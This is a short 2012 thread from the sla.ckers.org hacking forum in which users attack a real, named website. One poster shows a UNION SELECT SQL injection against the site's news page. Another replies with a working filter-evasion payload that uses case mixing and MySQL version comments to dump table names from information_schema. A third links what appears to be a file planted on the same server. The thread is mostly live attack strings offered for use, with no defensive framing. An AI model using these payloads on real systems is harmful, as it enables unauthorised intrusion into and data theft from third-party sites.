Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
mysql>5 can't get table_name
Posted by: annen
Date: May 05, 2012 07:01AM

http://www.ngclan.hk/news.php?nID=61
http://www.ngclan.hk/news.php?nID=61 UNION SELECT 1,2,3,4,5,6,7--work well.

Options: ReplyQuote
Re: mysql>5 can't get table_name
Posted by: zikmik
Date: May 08, 2012 05:40AM

http://www.ngclan.hk/news.php?nID=61+/*!AND*/+1=0+/*!unION*/+/*!selECT*/+1,2,3,grOUp_ConCat(/*!TaBlE_NamE*/),5,6,7+FrOm+InfoRmaTion_ScHEma./*!TaBleS*/+WheRe+Table_SchEma=DatAbAse()--

Don't be such a noob!!!

Options: ReplyQuote
Re: mysql>5 can't get table_name
Posted by: 0x3a
Date: May 08, 2012 10:26PM

http://www.ngclan.hk/files/good2.php----good

Options: ReplyQuote


Sorry, only registered users may post in this forum.